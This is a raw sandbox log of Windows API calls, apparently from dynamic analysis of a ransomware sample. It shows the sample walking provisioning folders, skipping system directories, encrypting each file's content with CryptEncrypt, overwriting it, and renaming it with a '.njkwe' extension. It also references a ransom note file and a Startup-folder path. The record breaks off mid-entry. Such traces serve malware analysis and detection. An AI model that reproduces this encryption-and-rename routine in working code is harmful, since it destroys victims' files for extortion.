StrStrIW (lpFirst="475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.056] lstrcmpW (lpString1="475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.056] lstrcmpW (lpString1="475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.056] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\475__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.056] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\475__connections_cellular_o2 - uk (united kingdom)_i4$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.056] GetTickCount () returned 0x115493a [0081.056] GetTickCount () returned 0x115493a [0081.056] GetTickCount () returned 0x115493a [0081.056] GetTickCount () returned 0x115493a [0081.057] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.057] GetProcessHeap () returned 0xbe0000 [0081.057] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.057] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x354, lpOverlapped=0x0) returned 1 [0081.060] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.060] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x354, lpOverlapped=0x0) returned 1 [0081.060] GetProcessHeap () returned 0xbe0000 [0081.060] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.060] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.060] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.060] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.061] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.061] CloseHandle (hObject=0x43c) returned 1 [0081.061] GetProcessHeap () returned 0xbe0000 [0081.061] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.061] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0081.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\475__connections_cellular_o2 - uk (united kingdom)_i4$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\475__connections_cellular_o2 - uk (united kingdom)_i4$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.062] GetProcessHeap () returned 0xbe0000 [0081.062] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.062] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9112f110, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9112f110, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9112f110, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1c7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="476__C~1.PRO")) returned 1 [0081.062] lstrcmpiW (lpString1="476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0081.062] lstrcmpiW (lpString1="476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0081.062] lstrcmpiW (lpString1="476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0081.062] lstrcmpiW (lpString1="476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0081.062] lstrcmpiW (lpString1="476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0081.062] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0081.062] StrStrIW (lpFirst="476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0081.062] lstrcmpW (lpString1="476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.062] lstrcmpW (lpString1="476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0081.062] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\476__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.062] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\476__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.062] GetTickCount () returned 0x115493a [0081.062] GetTickCount () returned 0x115493a [0081.062] GetTickCount () returned 0x115493a [0081.062] GetTickCount () returned 0x115493a [0081.062] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.063] GetProcessHeap () returned 0xbe0000 [0081.063] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.063] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1c7, lpOverlapped=0x0) returned 1 [0081.064] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.064] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1c7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1c7, lpOverlapped=0x0) returned 1 [0081.064] GetProcessHeap () returned 0xbe0000 [0081.064] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.064] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.064] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.065] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.065] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.065] CloseHandle (hObject=0x43c) returned 1 [0081.065] GetProcessHeap () returned 0xbe0000 [0081.065] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.065] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0081.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\476__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\476__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\476__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.066] GetProcessHeap () returned 0xbe0000 [0081.066] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.066] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9112f110, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9112f110, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9112f110, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml", cAlternateFileName="477__C~1.PRO")) returned 1 [0081.066] lstrcmpiW (lpString1="477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.066] lstrcmpiW (lpString1="477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.066] lstrcmpiW (lpString1="477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.066] lstrcmpiW (lpString1="477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.066] lstrcmpiW (lpString1="477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.066] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml") returned 163 [0081.066] StrStrIW (lpFirst="477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.066] lstrcmpW (lpString1="477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.066] lstrcmpW (lpString1="477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.066] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\477__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.066] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\477__connections_cellular_ee (united kingdom)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.067] GetTickCount () returned 0x115494a [0081.067] GetTickCount () returned 0x115494a [0081.067] GetTickCount () returned 0x115494a [0081.067] GetTickCount () returned 0x115494a [0081.067] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.067] GetProcessHeap () returned 0xbe0000 [0081.067] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.067] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x34a, lpOverlapped=0x0) returned 1 [0081.068] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.068] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x34a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x34a, lpOverlapped=0x0) returned 1 [0081.069] GetProcessHeap () returned 0xbe0000 [0081.069] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.069] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.069] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.069] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.069] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.069] CloseHandle (hObject=0x43c) returned 1 [0081.069] GetProcessHeap () returned 0xbe0000 [0081.069] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.069] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0081.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\477__connections_cellular_ee (united kingdom)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\477__Connections_Cellular_EE (United Kingdom)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\477__connections_cellular_ee (united kingdom)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.070] GetProcessHeap () returned 0xbe0000 [0081.070] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.070] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9115537f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9115537f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9115537f, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml", cAlternateFileName="478__C~1.PRO")) returned 1 [0081.070] lstrcmpiW (lpString1="478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.070] lstrcmpiW (lpString1="478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.070] lstrcmpiW (lpString1="478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.070] lstrcmpiW (lpString1="478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.070] lstrcmpiW (lpString1="478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.070] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml") returned 172 [0081.070] StrStrIW (lpFirst="478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.070] lstrcmpW (lpString1="478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.070] lstrcmpW (lpString1="478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.070] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\478__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.070] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\478__connections_cellular_vodafone uk (united kingdom)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.071] GetTickCount () returned 0x115494a [0081.071] GetTickCount () returned 0x115494a [0081.071] GetTickCount () returned 0x115494a [0081.071] GetTickCount () returned 0x115494a [0081.071] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.071] GetProcessHeap () returned 0xbe0000 [0081.071] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.071] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x34c, lpOverlapped=0x0) returned 1 [0081.072] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.072] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x34c, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x34c, lpOverlapped=0x0) returned 1 [0081.073] GetProcessHeap () returned 0xbe0000 [0081.073] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.073] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.073] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.073] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.073] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.073] CloseHandle (hObject=0x43c) returned 1 [0081.073] GetProcessHeap () returned 0xbe0000 [0081.073] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.073] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 192 [0081.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\478__connections_cellular_vodafone uk (united kingdom)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\478__Connections_Cellular_Vodafone UK (United Kingdom)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\478__connections_cellular_vodafone uk (united kingdom)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.074] GetProcessHeap () returned 0xbe0000 [0081.074] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.074] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9115537f, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9115537f, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9115537f, 